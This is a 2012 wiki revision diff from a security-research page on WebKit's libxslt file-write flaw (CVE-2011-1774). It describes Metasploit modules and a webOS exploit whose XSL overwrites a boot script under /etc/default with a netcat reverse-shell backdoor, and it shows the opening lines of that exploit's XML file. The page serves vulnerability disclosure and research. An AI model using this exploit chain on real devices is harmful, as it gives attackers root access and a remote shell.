Changes for page Application_Webkit

Last modified by Nicolas Gregoire on 2012/01/14 17:48
From version Icon 16.1 Icon
edited by Nicolas Gregoire
on 2012/01/14 00:44
Change comment: There is no comment for this version
To version Icon 9.1 Icon
edited by Nicolas Gregoire
on 2012/01/14 00:30
Change comment: Upload new image ipad-tmp-owned.png

Summary

Details

Icon Page properties
Tags
... ... @@ -1,1 +1,0 @@
1 -webkit|libxslt|metasploit|webOS|Apple|Safari|iPhone|iPad|exploit
Content
... ... @@ -26,16 +26,10 @@
26 26  Webkit uses [[libxslt>>Engine_libxslt]] as its XSLT engine. Old versions were not restricting __write__ access by the engine to the file system, leading to a remotely exploitable vulnerability ([[CVE-2011-1774>>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1774||rel="__blank"]]). This was patched in [[Changeset 79159>>http://trac.webkit.org/changeset/79159||rel="__blank"]] by adding appropriate calls to xsltSetSecurityPrefs().
27 27  
28 28  
29 -PoC included on the [[libxslt>>Engine_libxslt]] page demonstrate the vulnerability :
29 +PoC included on the [[libxslt>>Engine_libxslt]] page demonstrate the vulnerability.
30 30  
31 -[[image:macos-tmp-owned.png||style="display: block; margin-left: auto; margin-right: auto"]]
31 +== Meatsploit ==
32 32  
33 -
34 -
35 -[[image:ipad-tmp-owned.png||style="display: block; margin-left: auto; margin-right: auto"]]
36 -
37 -== Metasploit ==
38 -
39 39  Two modules are included in Metasploit :
40 40  
41 41  * a [[auxiliary>>http://www.metasploit.com/modules/auxiliary/server/webkit_xslt_dropper||rel="__blank"]] working on any non-sandboxed non-patched Webkit device
... ... @@ -45,7 +45,5 @@
45 45  
46 46  An exploit for HP webOS 3.x was developed. This exploit drops a backdoor which is later executed with root privileges at boot time. The exploit is composed of two files :
47 47  
48 -* [[webos-root-backdoor.xml>>attach:webos-root-backdoor.xml]] contains the configurable data (name and content of the destination file) and a processing instruction triggering the XSLT code
42 +* [[webos-root-backdoor.xml>>attach:webos-root-backdoor.xml]] contains the configurable data (name and content of the destination file) and a processing instruction trigger the XSLT code
49 49  * [[webos-root-backdoor.xsl>>attach:webos-root-backdoor.xsl]] reads the XML file and create the requested file on disk. This version overwrites a script located in /etc/default/ with a version including a reverse-shell based on netcat
50 -
51 -Browsing the XML file from a vulnerable device is enough to trigger the exploit. This was patched during the 3.0.2 OTA update.
Icon macos-tmp-owned.png
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -12.4 KB
Content Icon
Icon webos-root-backdoor.xml
Size
... ... @@ -1,1 +1,1 @@
1 -1721
1 +1711
Content
... ... @@ -1,5 +1,5 @@
1 1  <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
2 -<?xml-stylesheet type="text/xsl" href="webos-root-backdoor.xsl"?>
2 +<?xml-stylesheet type="text/xsl" href="xslt2root.xsl"?>
3 3  <exploit><location>/etc/default/mount_checks</location><content><![CDATA[# -*- mode: conf; -*-
4 4  
5 5  # Backdoor, by Nicolas Gregoire / Agarri